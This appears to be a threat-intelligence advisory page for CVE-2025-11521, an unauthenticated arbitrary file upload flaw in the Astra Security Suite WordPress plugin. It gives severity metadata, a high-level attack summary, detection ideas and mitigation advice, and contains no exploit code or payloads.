CVE Alert: CVE-2025-11521 - astrasecuritysuite - Astra Security Suite – Firewall & Malware Scan

CVE-2025-11521

HIGHNo exploitation known

The Astra Security Suite – Firewall & Malware Scan plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient validation of remote URLs for zip downloads and an easily guessable key in all versions up to, and including, 0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible.

CVSS v3.1 (8.1)

Vendor

astrasecuritysuite

Product

Astra Security Suite – Firewall & Malware Scan

Versions

* lte 0.2

CWE

CWE-285, CWE-285 Improper Authorization

Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Published

2025-11-11T03:30:52.495Z

Updated

2025-11-11T03:30:52.495Z

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/f99a6b5c-e95d-49d0-a4b2-1d7188447da1?source=cve

https://wordpress.org/plugins/getastra/

AI Summary Analysis

Risk verdict

High risk: unauthenticated remote arbitrary file upload with potential code execution via the affected WordPress security plugin; urgent to assess and patch.

Why this matters

Allows attackers to write executable files to the server without login, enabling full site compromise, data exposure, and service disruption. With no user interaction required and a public-facing surface, rapid automated exploitation is plausible on exposed sites.

Most likely attack path

Exploitation relies on network access with no authentication, but high attack complexity. An attacker would trigger the plugin’s zip-download flow and bypass validation to place a web-accessible payload, then exploit unintended code execution. If successful, the attacker could pivot within the host, potentially affecting other components or data.

Who is most exposed

Publicly reachable WordPress deployments using this plugin, especially on shared hosting with writable upload directories and weak server-side validation or poorly configured file permissions.

Detection ideas

Unusual POST/PUT activity to the plugin’s upload endpoints
Attempts to fetch remote ZIPs or write files in web-accessible areas
New PHP files appearing in uploads or webroot directories
Webshell or suspicious PHP execution requests in logs
Outbound connections to unfamiliar domains indicative of payload retrieval

Mitigation and prioritisation

Apply the latest patch or upgrade beyond the vulnerable version; if unavailable, disable/uninstall the plugin.
Implement Web Application Firewall rules to block suspicious zip-download patterns and unauthorised file writes.
Harden file permissions and restrict web server write access; relocate uploads to non-executable paths.
Validate deployment in a staging environment before production update; schedule a rapid maintenance window if applicable.
Monitor and alert on indicators of compromise; if KEV is confirmed or EPSS is ≥ 0.5, treat as priority 1.

Support Our Work

A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on Patreon or Buy Me A Coffee using the buttons below.

AI APIs OSINT driven New features

Buy Me A Coffee Patreon

Tags: astra-security-suite-firewall-and-malware-scan, astrasecuritysuite, CVE, cve-2025-11521, OSINT, threatintel